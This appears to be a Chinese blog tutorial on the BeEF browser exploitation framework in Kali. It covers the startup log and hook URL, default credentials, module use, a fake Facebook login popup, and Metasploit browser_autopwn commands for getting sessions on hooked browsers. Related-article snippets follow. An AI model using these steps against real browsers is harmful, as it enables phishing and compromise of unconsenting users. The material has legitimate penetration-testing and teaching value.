BeEF

最新推荐文章于 2025-09-07 19:45:25 发布
原创 最新推荐文章于 2025-09-07 19:45:25 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

官方: https://beefproject.com/

GitHub: https://github.com/beefproject/beef

kali启动beef:

/usr/share/beef-xss# ./beef 
[15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[15:07:21][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha #版本号
[15:07:21]    |   Twit: @beefproject
[15:07:21]    |   Site: http://beefproject.com
[15:07:21]    |   Blog: http://blog.beefproject.com
[15:07:21]    |_  Wiki: https://github.com/beefproject/beef/wiki
[15:07:21][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[15:07:21][*] Successful connection with Metasploit.
[15:07:21][*] Loaded 298 Metasploit exploits.
[15:07:21][*] BeEF is loading. Wait a few seconds...
[15:07:24][*] 13 extensions enabled.
[15:07:24][*] 552 modules enabled. #一共加载多少模块
[15:07:24][*] 2 network interfaces were detected.
[15:07:24][+] running on network interface: 127.0.0.1
[15:07:24]    |   Hook URL: http://127.0.0.1:3000/hook.js
[15:07:24]    |_  UI URL:   http://127.0.0.1:3000/ui/panel #登录界面
[15:07:24][+] running on network interface: 192.168.1.105
[15:07:24]    |   Hook URL: http://192.168.1.105:3000/hook.js
[15:07:24]    |_  UI URL:   http://192.168.1.105:3000/ui/panel
[15:07:24][*] RESTful API key: 893473366f7e05666f0a11c01c9fb6049c07d305
[15:07:24][*] HTTP Proxy: http://127.0.0.1:6789
[15:07:24][*] BeEF server started (press control+c to stop)

默认账号密码都是beef;修改配置 /usr/share/beef-xss/config.yaml 结合Metasploit框架配置文件:/usr/share/beef-xss/extensions/metasploit/config.yaml

登录打开控制台:

如果beef布置在公网服务器上,要修改配置文件,不然都可以登录访问控制台!!!

左侧显示被勾住的浏览器:

双击目标可以显示详细信息 

 

双击显示浏览器详细信息

绿色:表示该命令模块对目标可使用,将被检查到

橙色:表示该命令模块对目标可使用,可能被检查到

灰色:表示该命令模块尚未得到目标验证

红色:表示该命令模块针对目标不一定可使用


 

选中勾住的浏览目标可设置为代理,并将通过该浏览器代理挂钩网站所在域内的网站。

设置为代理 在Rider模块查看信息:

社会工程模块使用:

弹框Facebook登录界面:

查看记录能看到历史的记录:

使用metasploit结合Beef使用:

load msgrpc ServerHost=IP Pass=pass
use auxiliary/server/browser_autopwn
set URIPATH /
set LHOST IP
run

启动./beef -x

访问控制台能看到metasploit模块的数量增多了。

 

 

单个使用不一定有效 在设置URIPATH的时候set的 / 这样又便于使用多的模块展开攻击,只要给浏览器发送 例如:http://192.168.1.1:8080/ 

选完要使用的模块后:

 msf终端查看sessions

 

Beff安装与使用
m0_37786014的博客
03-07 5242
有很多版本的kali都是自带安装了Beff的,但是不知道我的kali为啥就没自动安装,所以这里我手动进行安装 1.安装beef 打开终端,输入如下命令: aptt-get install beef-xss 2. 打开beef 上诉安装好以后,建议重启kali机器 重启好以后就能正常打开beef软件了,打开以后会让你设置密码,这里自己设置密码 3. 打开beef 输入上面的地址即可打开beef,...
BeEF介绍
aletero的专栏
07-10 2833
什么是BeFF?         BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester对这个工具都有很高的赞美。        通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种
浏览器渗透测试框架BeEF:专业级的客户端攻击平台
最新发布
分享技术点滴
09-07 723
BeEF(The Browser Exploitation Framework)是一款专业的渗透测试工具,专注于Web浏览器和移动客户端的客户端攻击向量。与传统安全框架不同,BeEF绕过网络边界防护系统,通过开放的Web浏览器门户进行漏洞利用,实现对目标环境的深度安全评估。框架采用模块化架构设计,包含完整的API系统、扩展机制和实时通信能力,支持从基础的浏览器指纹识别到高级的持久化控制等多种攻击技术。
BEFF安装与配置
Kali与编程
12-19 1729
BeEF是一款功能强大的浏览器利用框架,对于渗透测试人员和安全研究人员来说,是一种有用的工具,可以帮助他们评估和加固浏览器的安全性。重要的是,在使用BeEF进行渗透测试时,要遵守法律和道德规范,并且只在合法授权的情况下使用该工具。选择适合自己的方式安装Kali Linux,配置好网络设置,并熟悉和掌握常用的渗透测试工具,这样就能够在Kali Linux环境中进行有效的渗透测试和安全审计工作。请记住,BeEF是一种强大的工具,应在合法的道德框架内使用,并遵循适用的法律和规定。
BeFF&&Metasploit&&Venom
自学编程_youkewang.top
03-14 990
这几天学习了BeFF,发现是个很牛逼的XSS平台,感觉Kali上面的工具都很牛逼;在网上看了很多文档,几乎都是BeFF结合MSF入侵XP的文章,觉得没什么创新,于是就有了这篇文章。测试环境:Kali,Win7,Venom思路:1.使用Venom生成免杀的bat文件用作后门.2.Kali开启apache并在网页中嵌入Hook地址。3.BeFF控制被劫持浏览器访问恶意地址;这里我使用Msf中的brow...
Beff的学习
dichiji8804的博客
04-28 2394
Beff介绍 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 首先打开kali,直接点击beef图标打开beef 浏览器会默认弹出beef登录界面,默认登录名密码均为beef 登录系统 在本地浏览器输入Beff默认页面(kali的IP+端口号3000+默认地址):http://192.1...
beef获取目标主机用户名和密码.docx
03-29
Beef 是一个专业的浏览器漏洞利用框架,主要用于合法研究和测试目的。下面是使用 Beef 获取目标主机用户名和密码的知识点: 一、Beef 简介 Beef 是一个基于 Ruby 的浏览器漏洞利用框架,旨在提供一个统一的平台,...
vasp.5.4.4&beef-src.tar.xz
03-20
VASP+BEEF beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT...
script.artwork.beef:Kodi管理艺术品的附加组件
05-26
Artwork Beef Beef自动为视频和音乐库中的媒体添加额外的插图。 它通常用于处理扩展的艺术品,就像Kodi和刮板已经为基本艺术品所做的一样。 它从出色的Web服务 , , 和。 它是为Kodi 17 Krypton开发的,也应该适用...
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
本文档介绍了一种常用的渗透测试工具——Beef,以及如何利用它对客户端浏览器进行劫持。 Beef(Browser Exploitation Framework)是一个基于Web的渗透测试框架,专门设计用于安全研究人员和渗透测试人员控制和操纵...
beef插件翻译.docx
12-09
Beef 插件翻译文档 Beef 插件是一个功能强大且广泛使用的渗透测试工具,它提供了多种模块来实现不同的攻击和信息收集任务。下面是 Beef 插件翻译文档中的知识点总结: 1. Module Tree(模块树): Module Tree 是...
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。 要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py 准备好了! 如果是disro,则牛肉目录将位于环境变量$ HOME中,位于termux中的$ PREFIX / opt中 Kali Linux(PC,Userland) Kali Nethunter无根 Termux 预览: Termux
beef安装
2403_82795493的博客
04-29 626
长度被限制了,做一个简单的xss绕过,检测源码,把maxlength改为100就行。把短链接发送给靶机访问(靶机访问就会受到xss攻击)利用生成的链接插入到,存在xss漏洞的地方。打开皮卡丘靶场,将payload插入到里面。第一次会提示让你输入新密码,用于一会登录。攻击机IP:192.168.0.105。本机IP:192.168.0.5。在登录beef,查看信息。把生成的新链接复制下来。启动beef-xss。
BeFF使用方法
自学编程_youkewang.top
03-14 4758
原文地址:http://resources.infosecinstitute.com/beef-part-1/ http://resources.infosecinstitute.com/beef-part-2/ BeEF使用浏览器漏洞来获得目标机器的控制权。BeEF提供API,我们可以编写自己的模块来攻击目标浏览器。 1. 安装 1)使用root权限执行下列命令: Xml代码  # apt-ge...
Linux自动化简单安装beef xss framework的方法及BeEF的启动
01-28 3895
Linux中BeEF的安装
linux安装BEEF
weixin_72453966的博客
03-26 223
BeEF(The Browser Exploitation Framework)是一款强大的浏览器渗透测试框架,主要用于对浏览器进行安全评估和攻击。通过控制受害者的浏览器,渗透测试人员可以执行多种攻击技术,如窃取信息、执行恶意代码等。BeEF 的目标是揭示现代浏览器的安全风险,并为安全研究人员提供一个强大的测试平台。跨平台支持:兼容多种操作系统,如 Windows、Linux、macOS。多种攻击模块:提供多种预定义的攻击模块,方便快速测试。实时控制:通过实时控制面板监控和操作受害者的浏览器。
kali上安装beef
weixin_45873667的博客
04-27 602
前言: BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具 安装BeEF步骤 打开kali sudo apt-get install beef-xss 输入beef-xss启动beef,输入用户名和密码,(默认都是admin) 接着输入beef-xss启动 ...
Beef的安装及基本使用
weixin_50341025的博客
04-15 2819
安装beef apt-get update apt-get install beef-xss 配置密码 /etc/beef-xss/config.yaml 默认用户名beef 修改用户名或者密码,注意用户名不需要符号括起来,密码则需要双引号括起来 启动服务 beef-xss 启动后会看见一些生成好的连接 [] Web UI: http://127.0.0.1:3000/ui/panel 管理页面 [] Hook: 样例地址 登录beef控制平台 将代码插入到目标URL,并欺骗被攻击
kali卸载beef
05-29
好的,我需要帮助用户在KaliLinux上彻底卸载Beef框架。首先,我得回想一下Beef的安装方式,因为不同的安装方法对应不同的卸载步骤。用户可能通过apt、gem或者源码安装过,所以需要覆盖所有可能性。首先,通过APT包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值